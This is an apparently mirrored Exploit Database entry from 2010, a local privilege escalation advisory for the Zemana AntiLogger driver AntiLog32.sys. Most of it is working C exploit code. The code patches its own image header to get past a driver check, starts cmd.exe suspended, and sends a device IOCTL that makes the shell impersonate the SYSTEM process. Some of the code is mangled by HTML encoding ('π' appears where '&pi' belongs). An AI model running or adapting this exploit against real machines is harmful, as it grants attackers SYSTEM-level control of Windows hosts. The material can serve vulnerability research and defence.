Zemana AntiLogger ‘AntiLog32.sys’ 1.5.2.755 – Local Privilege Escalation

• Exploit Database
• 117 阅读

• 作者： th_decoder
  日期： 2010-07-28
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14491/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109

  Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability   VULNERABLE PRODUCTS Zemana AntiLogger <=1.9.2.2.206   DETAILS: AntiLog32.sys create a device called \Device\AntiLog32 , and handles DeviceIoControl request IoControlCode = 0x8000201C , whichcan elevate the privilege of a process to another process   EXPLOIT CODE:   #include "stdafx.h" #include "windows.h" #include "winioctl.h" #define IOCTL_IMPERSONATE_PROCESS CTL_CODE(0x8000 , 0x807 , METHOD_BUFFERED , FILE_ANY_ACCESS)   typedef struct _IMPERSONATE_PROCESS{ HANDLE ImpersonateProcess ; HANDLE SystemProcess ; }IMPERSONATE_PROCESS , *PIMPERSONATE_PROCESS;   int main(int argc, char* argv[]) { printf("Zemana AntiLogger <=1.9.2.2.206 AntiLog32.sys <= 1.5.2.755\n" "Local Privilege Escalation Vulnerability Proof-of-Concept\n" "2010-7-28\n" "By MJ0011 th_decoder@126.com\n\nPress Enter\n"); getchar(); //bypass some useless create check   PIMAGE_DOS_HEADER pdoshdr = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL); PIMAGE_NT_HEADERS pnthdr = (PIMAGE_NT_HEADERS)((ULONG)pdoshdr + pdoshdr->e_lfanew); PVOID waddr = &pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress ; ULONG oldp ;   VirtualProtect(waddr , sizeof(ULONG) , PAGE_READWRITE , &oldp); pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0x1 ; VirtualProtect(waddr , sizeof(ULONG) , oldp , &oldp);     HANDLE hdev = CreateFile("\\\\.\\AntiLog32" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0, OPEN_EXISTING , 0,0);   if (hdev == INVALID_HANDLE_VALUE) { printf("cannot open device %u\n" , GetLastError()); getchar(); return 0;   }   STARTUPINFOA sia ; memset(&sia , 0 , sizeof(sia)); sia.cb = sizeof(sia); PROCESS_INFORMATION pi ; memset(π , 0 , sizeof(pi));     if (!CreateProcess("c:\\windows\\system32\\cmd.exe" , NULL , NULL, NULL, FALSE , CREATE_SUSPENDED, NULL, NULL, &sia , π)) { printf("cannot run cmd.exe....%u\n", GetLastError()); getchar(); return 0 ; }   IMPERSONATE_PROCESS ip ; ip.ImpersonateProcess = (HANDLE)pi.dwProcessId ; ip.SystemProcess = (HANDLE)4 ; //// WinXP and later ULONG btr ;   if (!DeviceIoControl(hdev , IOCTL_IMPERSONATE_PROCESS , &ip , sizeof(ip) , NULL , 0 , &btr, 0)) { printf("cannot impersonate process %u\n" , GetLastError()); getchar(); return 0 ; }   ResumeThread(pi.hThread);   printf("OK\n");   return 0; }   ================================         th_decoder 2010-07-28